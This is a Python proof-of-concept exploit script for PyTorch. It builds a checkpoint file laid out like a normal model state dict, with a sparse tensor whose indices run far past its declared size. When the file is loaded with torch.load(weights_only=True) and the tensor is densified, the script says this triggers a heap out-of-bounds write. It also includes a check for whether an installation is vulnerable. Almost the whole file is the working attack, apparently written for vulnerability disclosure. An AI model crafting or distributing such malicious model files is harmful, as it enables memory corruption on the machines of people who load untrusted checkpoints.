File size: 7,263 Bytes
238fd51
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
#!/usr/bin/env python3
"""
PoC: Sparse Tensor OOB Memory Corruption via torch.load(weights_only=True)

This PoC demonstrates that a crafted .pt file containing a sparse tensor
with out-of-bounds indices can be loaded with weights_only=True (the default
safe mode) and cause heap memory corruption when the tensor is used.

The root cause is that _validate_loaded_sparse_tensors() skips validation
when check_sparse_tensor_invariants is disabled (the default since PyTorch 2.8.0).

IMPACT: Heap OOB write when .to_dense() is called on the loaded sparse tensor.
AFFECTED: PyTorch >= 2.8.0 with weights_only=True (default since 2.6.0)

Usage:
    python poc_sparse_oob.py --create   # Creates malicious_model.pt
    python poc_sparse_oob.py --load     # Loads and triggers the bug
    python poc_sparse_oob.py --check    # Checks if current PyTorch is vulnerable
"""

import argparse
import sys
import os


def check_vulnerability():
    """Check whether the installed PyTorch skips loaded-sparse-tensor validation.

    Three checks are performed:
      1. The global sparse invariant checks must be disabled (the default).
      2. ``torch._utils._rebuild_sparse_tensor`` must be present in the
         ``weights_only`` unpickler allowlist, so sparse tensors can be
         rebuilt from an untrusted checkpoint at all.
      3. ``_validate_loaded_sparse_tensors()`` must actually skip validation.
         This is probed with a deliberately *invalid* sparse tensor (an
         out-of-bounds index): if validation runs it raises, if it is
         skipped the call returns silently.  NOTE: merely observing that
         ``_sparse_tensors_to_validate`` is emptied is NOT a valid probe,
         because the validator clears the queue whether or not it validated.

    Returns:
        bool: True if the installation appears vulnerable, False otherwise
        (including when PyTorch is not installed or any check fails).
    """
    try:
        import torch
    except ImportError:
        print("[!] PyTorch is not installed. Install it to test.")
        return False

    print(f"[*] PyTorch version: {torch.__version__}")

    # Check 1: invariant checks enabled means OOB indices are caught on load.
    invariants_enabled = torch.sparse.check_sparse_tensor_invariants.is_enabled()
    print(f"[*] Sparse tensor invariant checks enabled: {invariants_enabled}")

    if invariants_enabled:
        print("[*] NOT VULNERABLE: Sparse tensor invariant checks are enabled.")
        print("    This means _validate_loaded_sparse_tensors() will catch OOB indices.")
        return False

    # Check 2: the rebuild helper must be reachable from the safe unpickler.
    from torch._weights_only_unpickler import _get_allowed_globals
    allowed = _get_allowed_globals()
    rebuild_sparse_key = "torch._utils._rebuild_sparse_tensor"
    if rebuild_sparse_key in allowed:
        print(f"[*] _rebuild_sparse_tensor IS in the weights_only allowlist")
    else:
        print(f"[*] _rebuild_sparse_tensor is NOT in the weights_only allowlist")
        print("    NOT VULNERABLE via this vector.")
        return False

    # Check 3: probe the post-load validator with an invalid tensor.
    from torch._utils import _sparse_tensors_to_validate, _validate_loaded_sparse_tensors
    bad_probe = torch.sparse_coo_tensor(
        torch.tensor([[99]]),   # index 99 is out of bounds for size (10,)
        torch.tensor([1.0]),
        (10,),
        check_invariants=False,
    )
    _sparse_tensors_to_validate.append(bad_probe)
    try:
        _validate_loaded_sparse_tensors()
    except RuntimeError:
        # Validation actually ran and rejected the OOB index.
        print("[*] _validate_loaded_sparse_tensors() performed validation")
        return False
    finally:
        # The validator normally clears the queue itself; this guards against
        # the invalid probe lingering in the global list on any odd path.
        _sparse_tensors_to_validate.clear()

    print("[*] _validate_loaded_sparse_tensors() SKIPPED validation (no error raised)")
    print("[!] VULNERABLE: Sparse tensors loaded from files are NOT validated!")
    return True


def create_malicious_model(output_path="malicious_model.pt"):
    """Write a checkpoint whose 'sparse_layer' entry carries OOB sparse indices.

    The sparse COO tensor declares shape (10,) yet holds an index of 999999;
    densifying it after load forces a write far past the end of the buffer.

    Args:
        output_path: Destination path for the crafted ``.pt`` file.

    Returns:
        str: The path the checkpoint was written to.
    """
    import torch

    print(f"[*] Creating malicious model file: {output_path}")

    # Indices deliberately exceed the declared tensor size: 999999 >> 10.
    bad_indices = torch.tensor([[0, 7, 999999]])
    bad_values = torch.tensor([1.0, 2.0, 3.0])
    shape = torch.Size([10])

    # Suppress every invariant check so the inconsistent tensor can exist.
    with torch.sparse.check_sparse_tensor_invariants(False):
        evil_sparse = torch.sparse_coo_tensor(
            bad_indices, bad_values, shape, check_invariants=False
        )

    # Package it next to ordinary tensors so the file resembles a normal
    # model checkpoint (state-dict layout).
    checkpoint = {
        "weight": torch.randn(10, 10),
        "bias": torch.randn(10),
        "sparse_layer": evil_sparse,
    }
    torch.save(checkpoint, output_path)

    print(f"[+] Malicious model saved to {output_path}")
    print(f"    File size: {os.path.getsize(output_path)} bytes")
    print(f"[*] The 'sparse_layer' key contains a sparse tensor with OOB indices")
    print(f"    Declared size: {shape}")
    print(f"    Max index in indices: {bad_indices.max().item()}")
    return output_path


def load_and_trigger(model_path="malicious_model.pt", *, confirm=True):
    """Load the crafted checkpoint and trigger the OOB memory access.

    Loads ``model_path`` with ``weights_only=True`` (the default safe mode),
    prints diagnostics about the embedded sparse tensor, then calls
    ``.to_dense()`` on it — which is where the out-of-bounds write occurs.

    Args:
        model_path: Path to the checkpoint produced by create_malicious_model().
        confirm: When True (the default, preserving the original interactive
            behavior) pause for an Enter keypress before the dangerous
            ``.to_dense()`` call; pass False for non-interactive/automated runs.
    """
    import torch

    print(f"[*] Loading model from: {model_path}")
    print(f"[*] Using weights_only=True (the default safe mode)")

    # This should succeed -- weights_only=True allows sparse tensors
    state_dict = torch.load(model_path, weights_only=True)

    print(f"[+] Model loaded successfully with weights_only=True")
    print(f"[*] Keys in state_dict: {list(state_dict.keys())}")

    sparse_tensor = state_dict["sparse_layer"]
    print(f"[*] Sparse tensor loaded:")
    print(f"    Layout: {sparse_tensor.layout}")
    print(f"    Size: {sparse_tensor.size()}")
    print(f"    Indices shape: {sparse_tensor._indices().shape}")
    print(f"    Max index: {sparse_tensor._indices().max().item()}")
    print(f"    Invariant checks enabled: {torch.sparse.check_sparse_tensor_invariants.is_enabled()}")

    print()
    print("[!] About to call .to_dense() -- this will trigger OOB memory write!")
    print("[!] The tensor has index 999999 but size is only 10")
    print("[!] This writes to memory offset 999999 * sizeof(float) = ~4MB past buffer end")
    print()

    # WARNING: This will likely crash or corrupt memory
    if confirm:
        input("Press Enter to trigger the OOB write (or Ctrl+C to abort)... ")

    try:
        dense = sparse_tensor.to_dense()
        print(f"[!] to_dense() completed (memory may be corrupted)")
        print(f"    Dense shape: {dense.shape}")
        print(f"    Dense values: {dense}")
    except Exception as e:
        print(f"[!] Exception during to_dense(): {type(e).__name__}: {e}")


def main():
    """Parse command-line flags and dispatch to the requested PoC action."""
    parser = argparse.ArgumentParser(
        description="PoC: Sparse Tensor OOB via torch.load(weights_only=True)"
    )
    # Register the three mode flags uniformly; help strings are unchanged.
    for flag, help_text in (
        ("--create", "Create the malicious model file"),
        ("--load", "Load the malicious model and trigger the bug"),
        ("--check", "Check if the current PyTorch is vulnerable"),
    ):
        parser.add_argument(flag, action="store_true", help=help_text)
    parser.add_argument("--output", default="malicious_model.pt",
                        help="Output path for the malicious model file")
    opts = parser.parse_args()

    # With no mode selected, just show usage and stop.
    if not (opts.create or opts.load or opts.check):
        parser.print_help()
        return

    # --check exits with status 0 when vulnerable, 1 otherwise.
    if opts.check:
        sys.exit(0 if check_vulnerability() else 1)

    if opts.create:
        create_malicious_model(opts.output)

    if opts.load:
        load_and_trigger(opts.output)


# Script entry point: run the CLI dispatcher only when executed directly,
# not when imported as a module.
if __name__ == "__main__":
    main()